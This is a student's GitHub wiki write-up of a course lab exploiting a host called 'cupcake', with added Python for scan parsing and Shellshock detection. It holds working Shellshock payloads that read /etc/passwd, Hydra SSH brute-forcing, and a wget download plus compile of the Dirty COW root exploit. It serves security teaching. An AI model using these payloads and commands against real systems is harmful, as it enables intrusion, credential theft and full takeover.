Activity 4.1 Exploiting Cupcake - Oliver-Mustoe/Oliver-Mustoe-Tech-Journal GitHub Wiki

This page contains notes & reflection for exploiting "cupcake"

Notes

First I used the following general nmap scan against the top 100 ports to get a list of open ports on the host "cupcake" (10.0.5.23):

  • sudo nmap 10.0.5.23 --top-ports 100

(NOTE: Explanations of the nmap commands given on this page are contained in the dedicated "NMAP commands and techniques" page.)

This gave me 2 open ports (22 and 80) running 2 services (ssh and http). With this knowledge I then used the following command to conduct a focused version scan against just those ports:

  • sudo nmap 10.0.5.23 -p 22,80 -A

I then looked at the webserver, "http://10.0.5.23", and found it linked to a "Server Status Report" located at "/cgi-bin/status" (THIS IS VERY IMPORTANT FOR LATER). I also triggered an error page on the webserver; the server signature at the bottom of Apache's default error page gave me information about the OS (CentOS).

Afterwards I did some digging with the OpenSSH version, since every version of a Linux OS I have used has OpenSSH installed by default. Using "rpm.pbone.net" I found that this release of OpenSSH (the openssh-5.3p1-94.el6 package) is meant for "CentOS 6":

Credit: http://rpm.pbone.net/info_idpl_25010169_distro_centos_6_com_openssh-5.3p1-94.el6.x86_64.rpm.html

With this initial recon I gathered the following important information about cupcake:

  • Ports 22 (SSH) and port 80 (HTTP) are open and running services
    • The webserver on port 80 is Apache httpd 2.2.15 and the SSH service on port 22 is OpenSSH 5.3
  • The hostname: cupcake
  • What OS it is running on: CentOS 6

I then ran another scan and converted it to a csv format with the following command:

  • sudo nmap 10.0.5.23 -sT -A --top-ports 100 -Pn -oG top100ports.txt && nmaptocsv -i top100ports.txt -d ","
    • This tells nmap to perform a TCP connect scan, -sT, with aggressive detection (service/version detection, OS detection, default scripts and traceroute), -A, on the top 100 well-known ports, --top-ports 100, while skipping host discovery, -Pn, and writing the results in grepable format to top100ports.txt, -oG. The && then feeds that grepable file as input, -i, to nmaptocsv with a comma as the delimiter, -d ",". The result is a CSV-formatted version of the scan printed to the console.

I then took that output and copied it into a Google sheets file, and made sure to split the text into columns. This created a nicely formatted sheets file.
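The grepable file that nmaptocsv consumes above has a simple line-oriented layout: one tab-separated "Host:" line per target, with a "Ports:" field whose entries look like port/state/proto/owner/service/rpc info/version/. As an added example (my own code, not nmaptocsv and not part of the original page), the following Python parses that format and emits the same kind of CSV. The scan output it runs on is a constructed sample written to match the ports and versions found on cupcake, not the real top100ports.txt.

```python
import csv
import io
import re
from typing import Dict, List

# Constructed sample of nmap's grepable (-oG) output. It mirrors what the scan
# on this page would produce for cupcake, but it is written here by hand and
# is not the real top100ports.txt.
SAMPLE_GNMAP = (
    "# Nmap 7.92 scan initiated as: nmap 10.0.5.23 -sT -A --top-ports 100 -Pn -oG top100ports.txt\n"
    "Host: 10.0.5.23 (cupcake)\tStatus: Up\n"
    "Host: 10.0.5.23 (cupcake)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/\tIgnored State: closed (98)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")
# Field order inside one port entry of a grepable "Ports:" list.
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc_info", "version")
# Columns kept in the CSV (owner and rpc info are dropped; they are empty for TCP scans).
CSV_COLUMNS = ("ip", "hostname", "port", "proto", "state", "service", "version")


def parse_gnmap(text: str) -> List[Dict[str, str]]:
    """Turn the Host/Ports lines of -oG output into one record per port."""
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines ("# Nmap ...") carry no port data
        fields = line.split("\t")
        ports_field = next((f for f in fields if f.startswith("Ports: ")), None)
        if ports_field is None:
            continue  # the "Status: Up" line has no Ports field
        ip, hostname = HOST_RE.match(fields[0]).groups()
        # Entries are separated by ", " and each ends with "/". The version
        # string may itself contain "/", so split at most 6 times.
        for entry in ports_field[len("Ports: "):].split("/, "):
            if entry.endswith("/"):
                entry = entry[:-1]
            parts = entry.split("/", 6)
            parts += [""] * (len(PORT_FIELDS) - len(parts))
            rec = dict(zip(PORT_FIELDS, parts))
            rec["ip"], rec["hostname"] = ip, hostname
            records.append(rec)
    return records


def to_csv(records: List[Dict[str, str]], delimiter: str = ",") -> str:
    """Render the records as CSV text with a header row (like nmaptocsv -d)."""
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=CSV_COLUMNS, delimiter=delimiter,
                            extrasaction="ignore", lineterminator="\n")
    writer.writeheader()
    writer.writerows(records)
    return out.getvalue()


if __name__ == "__main__":
    # Paste this output straight into a spreadsheet and split on the delimiter.
    print(to_csv(parse_gnmap(SAMPLE_GNMAP)))
```

Splitting the entry on "/" with a maximum of six splits matters in practice: version strings such as "Apache/2.2.15" contain a slash of their own, and a naive split would shift the columns.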

With this initial recon finished, I then went online and searched on the versions of the services, particularly the Apache webserver, and found multiple potential remote vulnerabilities. The "cgi-bin" directory on the web server indicates CGI (Common Gateway Interface) is enabled, since it is the default script directory for CGI scripts. Apache hands request headers to CGI scripts as environment variables, so if a script in that directory is a bash script (or shells out to bash), the Shellshock vulnerability (CVE-2014-6271, bash executing code appended to a function definition imported from the environment) could be used to run commands as the web server user.

I exploited this vulnerability in two different ways:

Way 1: NMAP
Example:

  • sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -r" 10.0.5.23


Tips and tricks:

  • When executing code, do it after the 2 echos: they print the blank line that ends the CGI header block, so the command output lands in the HTTP response body instead of being rejected by Apache as a malformed header
  • When executing a command, use the absolute path to the binary as it exists on the target. On Kali, which uname reports "/usr/bin/uname", but CentOS 6 does not merge /bin into /usr/bin, so on cupcake the path is "/bin/uname" (drop the "/usr")
  • The command, /bin/uname -r, and the IP could be changed for a different scenario

Way 2: CURL
Example:

  • curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.0.5.23/cgi-bin/status


Tips and tricks:

  • The header value must begin with the exact function-definition prefix "() { :; };"; a vulnerable bash parses that as a function import and then keeps executing whatever follows it
  • When executing code, do it after the 2 echos: they print the blank line that ends the CGI header block, so the command output lands in the HTTP response body (without them, /etc/passwd lines would be read as "name: value" headers and never reach you)
  • When executing a command, use the absolute path to the binary as it exists on the target, e.g. "/bin/cat" on CentOS 6 even though which cat reports "/usr/bin/cat" on Kali (drop the "/usr")
  • The command, /bin/cat /etc/passwd, the IP, and the CGI script path could be changed for a different scenario
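Both methods above send the same thing: a request header whose value is a bash function definition followed by commands, to a URL that Apache's mod_cgi executes. The Python below is an added example written for this page (it is not the nmap script, not the curl one-liner, and not anything from cupcake). It builds the raw request the curl method sends, models how Apache splits a CGI script's output into headers and body (which is the reason for the two echos), and, for the defensive side, flags Shellshock attempts in Apache combined-format access-log lines. The log lines and the request samples are constructed; the only values taken from the page are the IPs, the URI and the commands.

```python
import re
from typing import Dict, List, Tuple

# Function-definition prefix that a bash vulnerable to CVE-2014-6271 recognises
# in any environment variable. The bug is that bash keeps executing whatever
# follows the closing "};". This spelling is what the curl one-liner sends and
# what nmap's http-shellshock script prepends to its cmd argument.
SHELLSHOCK_PREFIX = "() { :; };"


def build_shellshock_request(host: str, uri: str, cmd: str) -> bytes:
    """Raw HTTP/1.1 request equivalent to the curl method.

    mod_cgi exports request headers to the script as environment variables
    (User-Agent becomes HTTP_USER_AGENT), which is how the payload reaches
    bash. "echo; echo;" prints the blank line that terminates the CGI header
    block so the command output is returned in the response body.
    """
    payload = f"{SHELLSHOCK_PREFIX} echo; echo; {cmd}"
    request = (
        f"GET {uri} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {payload}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode()


def split_cgi_output(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Model of how Apache splits a CGI script's stdout into headers and body.

    Header lines run until the first blank line. A line without a colon before
    that blank line is Apache's "malformed header from script" case, which the
    client sees as HTTP 500. Returns (status, headers, body).
    """
    headers: Dict[str, str] = {}
    lines = raw.split("\n")
    for i, line in enumerate(lines):
        line = line.rstrip("\r")
        if line == "":
            return 200, headers, "\n".join(lines[i + 1:])
        if ":" not in line:
            return 500, headers, ""
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # stdout ended while still inside the header block: modelled here as
    # headers only, no body.
    return 200, headers, ""


# Matches the function-definition prefix wherever it appears in a log line
# (user-agent, referer, cookie or request line), tolerating spacing variants
# such as "() { :;};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def find_shellshock_attempts(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, requested_uri, matched_prefix) for each Apache
    combined-log line that carries a Shellshock function-definition prefix."""
    hits = []
    for line in log_lines:
        m = SHELLSHOCK_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        r = REQUEST_RE.search(line)
        hits.append((ip, r.group(1) if r else "", m.group(0)))
    return hits


# Constructed Apache combined-log sample (not taken from cupcake): two attempts
# from the attacking box and one ordinary browser request.
SAMPLE_ACCESS_LOG = [
    '10.0.99.34 - - [01/Oct/2022:14:02:11 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :; }; echo; echo; /bin/cat /etc/passwd"',
    '10.0.99.34 - - [01/Oct/2022:14:02:30 -0400] "GET /cgi-bin/status HTTP/1.1" 200 431 "-" '
    '"() { :;}; echo; echo; /bin/uname -r"',
    '10.0.5.50 - - [01/Oct/2022:14:03:02 -0400] "GET /cgi-bin/status HTTP/1.1" 200 1203 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"',
]

if __name__ == "__main__":
    print(build_shellshock_request("10.0.5.23", "/cgi-bin/status", "/bin/uname -r").decode())
    # Without the echos, /etc/passwd lines are swallowed as "root: x:0:0..." headers.
    print(split_cgi_output("root:x:0:0:root:/root:/bin/bash\n\n"))
    for ip, uri, prefix in find_shellshock_attempts(SAMPLE_ACCESS_LOG):
        print(f"shellshock attempt from {ip} against {uri}: {prefix!r}")
```

The split_cgi_output model makes the "after the 2 echos" tip concrete: output of /bin/uname -r with no leading blank line is a header without a colon (a 500), and output of /bin/cat /etc/passwd with no leading blank line is a pile of colon-separated lines that Apache happily treats as headers, so the body comes back empty. The detection regex is deliberately loose about whitespace because real attempts vary the spacing inside the braces.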

Then I used the password list contained in "/usr/share/wordlists/rockyou.txt.gz" (decompressed with gunzip first, since grep does not read .gz files) to assemble a list of likely passwords based on cupcake's "/etc/passwd" (see above in "Way 2", specifically the "samwise" user) with the command:

  • cat rockyou.txt | grep -i samwise >> samwiselikeypasswds.txt

Notes about command:

  • The "-i" flag for grep indicates a case-insensitive search
  • Had a hint about what wordlist to use ("rockyou.txt") and about how many passwords I should have (28)
    • Using the grep command's "-c" flag displays how many matches you have received, helpful with password hints :)

I then took my password list and used the Hydra tool to test all the passwords in "samwiselikeypasswds.txt" with the command:

  • hydra -l samwise -P samwiselikeypasswds.txt 10.0.5.23 -t 4 ssh

Which resulted in me getting the samwise password/into cupcake and capturing the user-flag!!!

NOTE: I had to add the following lines to "~/.ssh/config" (ideally scoped under a Host entry for cupcake rather than applied globally), because OpenSSH clients from 8.8 onward disable ssh-rsa (SHA-1) signatures by default and the OpenSSH 5.3 server on cupcake offers nothing newer:

HostKeyAlgorithms +ssh-rsa
PubkeyAcceptedAlgorithms +ssh-rsa

Once I had gained this access, I then wanted to get root access to cupcake. First I used the searchsploit command to find exploits for the Linux kernel version (CentOS 6 ships a 2.6.32 kernel, which the earlier /bin/uname -r output confirms) with the command:

  • searchsploit Linux Kernel 2.6

Then I downloaded one of the exploits, Exploit-DB 40839 (the Dirty COW, CVE-2016-5195, proof of concept that rewrites /etc/passwd), with the command:

  • searchsploit -m 40839

NOTE: This exploit was recommended by the professor

I then hosted a local webserver with python (in the folder with the downloaded .c file) on my kali box with the command (pick a random high, unprivileged port so it does not collide with anything else listening on the box):

  • python3 -m http.server {RANDOM_PORT}

Which I then could, while logged into samwise on cupcake, download my exploit from my webserver with the command:

  • wget http://10.0.99.34:{RANDOM_PORT}/40839.c

On cupcake, since it has gcc, I could compile my exploit with the command (-lpthread and -lcrypt link the pthread and crypt libraries the exploit needs):

  • gcc 40839.c -o cow -lpthread -lcrypt

I then ran the newly created "cow" file, ./cow. The exploit uses Dirty COW to rewrite /etc/passwd (after backing up the original to /tmp/passwd.bak), adding a new UID 0 user "firefart" with the password I chose, thereby granting me root. I then restored the .bak file created during the process :)

Reflection

  • Work on improving exploit research
    • Need to learn how to better integrate the information I am gathering for exploits. Also, keep in mind that I can create VMs of targets for testing vulnerabilities (for later.)
    • Learn how to use/better use `searchsploit`
    • Maybe keep a directory of "working" exploits that I use throughout the course?!?
  • Work on note taking
    • I took good notes on details throughout this engagement, but I should keep a spreadsheet open to jot down information (OS, what non-default users exist, IPs, services, etc.)
  • Learn more about Shellshock
    • Seems like a very powerful exploit that I should know a bit more about; learn how the two ways that were executed in class work in a less superficial way.
  • Research more remote code execution vulnerabilities
    • Research how the 2 methods we used in class work (beyond just swapping in a different command).

Sources: